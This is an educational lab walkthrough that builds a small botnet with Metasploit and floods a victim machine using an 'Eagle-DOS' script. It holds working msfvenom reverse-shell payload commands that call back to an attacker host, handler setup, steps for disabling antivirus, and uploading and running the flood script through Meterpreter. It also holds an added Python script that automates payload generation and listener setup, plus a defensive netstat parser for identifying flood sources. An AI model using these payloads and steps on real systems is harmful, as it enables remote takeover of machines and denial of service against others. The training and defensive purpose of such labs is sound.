**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.**
This article examines how Distributed Denial of Service (DDoS) attacks work, focusing on the use of a botnet: a group of compromised systems that an attacker controls and uses to flood a target with traffic. DDoS attacks are common and can take systems offline by exhausting their resources (CPU, memory, connection tables or bandwidth), making them unreachable for legitimate users.
A botnet is a group of internet-connected devices, each infected with malware that lets an attacker control it remotely. The attacker uses these hijacked devices, or “bots,” to generate large volumes of traffic that swamp the target. Real DDoS attacks rely on large botnets; this guide instead shows a small mock scenario, with two bots, in a controlled lab on an isolated virtual network, using Metasploit and the Eagle-DOS script.
Walkthrough
This walkthrough demonstrates how to simulate a DDoS scenario using Metasploit and the eagle-dos.py script. The setup includes:
– One Attacker Machine: Kali Linux (192.168.118.147)
– Two Systems to compromise to create a botnet: Windows (192.168.118.137, 192.168.118.148)
– One Victim Machine: Windows target (192.168.118.146)
VMware Workstation can be used to set up the scenario; place all four VMs on the same isolated (host-only) virtual network so the flood never reaches anything outside the lab.
Step 1: Set Up Reverse Shell Payloads on Kali Linux
1. Generate the payloads with msfvenom on the Kali Linux machine. Use the same payload type but a different listening port for each system you will compromise, so that each bot calls back to its own handler and its session is easy to tell apart.
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.147 LPORT=6969 -f exe > exploit1.exe
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.147 LPORT=9999 -f exe > exploit2.exe
2. Start Apache Server
# service apache2 start
3. Copy the payloads to the document root of the Apache web server
# cp exploit1.exe exploit2.exe /var/www/html
Step 2: Establish Reverse Shells from Compromised Machines
1. Open Metasploit and Set Up Handlers
For each machine to be compromised, open a new terminal and start a handler on that machine's port (the LPORT must match the one baked into its payload):
# msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.118.147; set LPORT 6969; run"
# msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.118.147; set LPORT 9999; run"
2. Access Payloads on Windows Machines
On the first Windows machine to be compromised (192.168.118.137), open a web browser and navigate to http://192.168.118.147/exploit1.exe to download the payload.
On the second Windows machine to be compromised (192.168.118.148), open a web browser and navigate to http://192.168.118.147/exploit2.exe to download the payload.
Run exploit1.exe on the first machine and exploit2.exe on the second. An unencoded msfvenom executable is detected by Microsoft Defender, so on these lab VMs disable real-time protection (or add an exclusion for the download folder) beforehand; otherwise the file is quarantined before it ever runs.
3. Verify Meterpreter Sessions
Check in each handler's console that a Meterpreter session has opened (the prompt changes to meterpreter >); this indicates control over that compromised system.
Screenshot: Meterpreter session from Windows (192.168.118.137)
Screenshot: Meterpreter session from Windows (192.168.118.148)
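The two steps above hand-type each msfvenom command and each handler in its own terminal, and the classic failure mode is a payload whose LPORT has no matching handler (the bot calls back into nothing and no session ever appears). The following script is an added example for this lab, not the article's own tooling: one bot table drives both the msfvenom command lines and a Metasploit resource script that starts every handler as a background job in a single msfconsole (msfconsole -q -r handlers.rc), and it checks that every payload port has a listener. The document root /var/www/html, the use of msfvenom's -o flag to write straight into it, and the handlers.rc file name are assumptions.

```python
"""Generate msfvenom commands and a Metasploit resource script from one bot
table so every payload's LPORT has a matching handler. Added example for the
lab above; not the article's code. WEBROOT and the -o usage are assumptions."""
import subprocess
from pathlib import Path

LHOST = "192.168.118.147"                       # Kali attacker machine
PAYLOAD = "windows/meterpreter/reverse_tcp"
WEBROOT = Path("/var/www/html")                 # Apache document root (assumed)

# bot IP -> (handler port, payload file served by Apache)
BOTS = {
    "192.168.118.137": (6969, "exploit1.exe"),
    "192.168.118.148": (9999, "exploit2.exe"),
}


def msfvenom_cmd(lhost, lport, outfile, payload=PAYLOAD):
    """argv for msfvenom: reverse_tcp EXE that calls back to lhost:lport."""
    return ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
            "-f", "exe", "-o", str(outfile)]


def handler_rc(lhost, lports, payload=PAYLOAD):
    """Resource script: one multi/handler per port, all as background jobs
    in a single msfconsole instead of one terminal per bot."""
    lines = []
    for lport in lports:
        lines += [
            "use exploit/multi/handler",
            f"set payload {payload}",
            f"set LHOST {lhost}",
            f"set LPORT {lport}",
            "set ExitOnSession false",   # keep listening after the first callback
            "run -j",                    # run as a job; the console stays usable
        ]
    lines.append("jobs -l")              # list the listeners that were started
    return "\n".join(lines) + "\n"


def handler_ports(rc_text):
    """Ports the resource script actually listens on."""
    return {int(line.split()[-1]) for line in rc_text.splitlines()
            if line.startswith("set LPORT ")}


def missing_handlers(rc_text, bots):
    """Payload ports with no handler: a payload on such a port calls back
    into nothing and its session never appears."""
    return {port for port, _ in bots.values()} - handler_ports(rc_text)


def build(bots=BOTS, lhost=LHOST, run=False):
    """Return (msfvenom argvs, resource script text); with run=True also
    generate the EXEs into WEBROOT and write handlers.rc on the Kali host."""
    cmds = [msfvenom_cmd(lhost, port, WEBROOT / name) for port, name in bots.values()]
    rc = handler_rc(lhost, [port for port, _ in bots.values()])
    missing = missing_handlers(rc, bots)
    if missing:
        raise ValueError(f"no handler for payload ports {sorted(missing)}")
    if run:
        for cmd in cmds:
            subprocess.run(cmd, check=True)
        Path("handlers.rc").write_text(rc)
        print("start the listeners with: msfconsole -q -r handlers.rc")
    return cmds, rc


if __name__ == "__main__":
    build(run=True)
```

Run it as root on Kali (msfvenom needs to write into the web root); the resource script replaces the two separate msfconsole invocations, and sessions -l in that one console then shows both bots.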
Step 3: Deploy the eagle-dos.py Script to the Botnet Machines
1. Open eagle-dos.py
# nano eagle-dos.py
2. Set the IP variable to 192.168.118.146 (the victim machine's IP address), then save and exit the editor.
3. In each Meterpreter session, run the following command to upload the script to the bot's current working directory:
upload /home/kali/eagle-dos.py
Step 4: Run the DDoS Script on Each Compromised Machine
In each Meterpreter session, execute:
powershell_shell
If the command is not recognised, the PowerShell extension is not loaded yet; load it and then run powershell_shell again:
load powershell
Once the PowerShell prompt appears, execute:
.\eagle-dos.py
This relies on Python being installed on the bot with the .py extension associated to it; if it is not, run python .\eagle-dos.py instead.
The screenshots of the compromised systems show the script running on each bot and sending traffic to the victim's machine:
Step 5: Monitor and Analyze Traffic on the Target Machine
On the victim, open Task Manager (Performance tab) or Resource Monitor and watch CPU and network utilisation climb as the flood arrives. If the script opens TCP connections, netstat -n on the victim lists them with the two bot addresses in the Foreign Address column, which is how the sources of the traffic are identified.
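Watching the CPU graph confirms impact but not origin. The script below is an added example for this monitoring step (not part of the article): it parses netstat -n output, counts connections per remote address, and flags the addresses holding more than a threshold of connections, plus a per-state breakdown so a pile of half-open SYN_RECEIVED connections stands out. The netstat dump is constructed to look like the lab above with two bots and one legitimate client; on the real victim, feed in live netstat -n output instead. It assumes the flood shows up as TCP connections; a pure UDP flood would have to be counted from a packet capture rather than from netstat.

```python
"""Triage flood sources on the victim from `netstat -n` output. Added example
for the monitoring step; not the article's code. SAMPLE_NETSTAT is constructed
(Windows column layout) to resemble the lab above."""
import re
from collections import Counter

# local addr:port, foreign addr:port, state; fits Windows and Linux netstat -n.
CONN_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+([A-Z_]+)"
)
NOT_A_CONNECTION = {"LISTENING", "LISTEN"}   # listening sockets have no peer

# Constructed sample: two bots hammering port 80, one normal client, one listener.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    192.168.118.146:80     192.168.118.137:49712  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.137:49713  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.137:49714  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.137:49715  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.137:49716  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.137:49717  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.148:51001  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.148:51002  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.148:51003  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.148:51004  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.148:51005  SYN_RECEIVED
  TCP    192.168.118.146:80     192.168.118.1:50001    ESTABLISHED
  UDP    0.0.0.0:123            *:*
"""


def parse_connections(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state) for each
    TCP connection line; listening sockets and UDP lines are skipped."""
    for line in text.splitlines():
        m = CONN_RE.search(line)
        if m and m.group(5) not in NOT_A_CONNECTION:
            yield m.group(1), int(m.group(2)), m.group(3), int(m.group(4)), m.group(5)


def flood_sources(text, threshold, local_port=None):
    """Remote IPs holding at least `threshold` connections (optionally only to
    one local port), busiest first; a normal client rarely has more than a few."""
    counts = Counter(
        rip for _lip, lport, rip, _rport, _state in parse_connections(text)
        if local_port is None or lport == local_port
    )
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]


def state_breakdown(text):
    """Connections per TCP state; a half-open flood shows as a pile of
    SYN_RECEIVED (SYN_RECV on Linux) from the bot addresses."""
    return Counter(conn[4] for conn in parse_connections(text))


if __name__ == "__main__":
    import subprocess
    import sys
    # `--live` runs netstat -n on this host; otherwise the constructed sample is used.
    if "--live" in sys.argv:
        text = subprocess.run(["netstat", "-n"], capture_output=True, text=True).stdout
    else:
        text = SAMPLE_NETSTAT
    for ip, n in flood_sources(text, threshold=4):
        print(f"{ip:16} {n} connections")
    print(dict(state_breakdown(text)))
```

With a threshold of 4 the sample yields the two bot addresses and nothing else; the legitimate client at 192.168.118.1 with its single ESTABLISHED connection is below it. The same counts are the basis for a quick mitigation in the lab, such as a host firewall rule dropping the flagged sources.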
In this walkthrough, we simulated a DDoS attack using a small botnet built with Metasploit and the Eagle-DOS script. We set up reverse shells to compromise two Windows machines, deployed the DDoS script on each compromised system, and launched a simulated attack against a target machine. Monitoring the target's resource usage revealed the impact of the attack and showed how a botnet can exhaust a system's resources and potentially render it inaccessible.
Summary Points
1. Payload Generation: Created reverse shell payloads using msfvenom on the Kali Linux attacker machine.
2. File Hosting: Set up an Apache web server on Kali Linux to host payloads for easy access by compromised systems.
3. Establishing Reverse Shells: Used Metasploit handlers to receive the Meterpreter callbacks from the two Windows machines and gain control over them.
4. Deploying Eagle-DOS Script: Configured and uploaded eagle-dos.py to the compromised machines.
5. Launching the Attack: Executed the script from each compromised machine, directing traffic toward the target machine to simulate a DDoS attack.
6. Monitoring Impact: Analyzed the target machine’s CPU and resource usage to observe the effects of the simulated DDoS.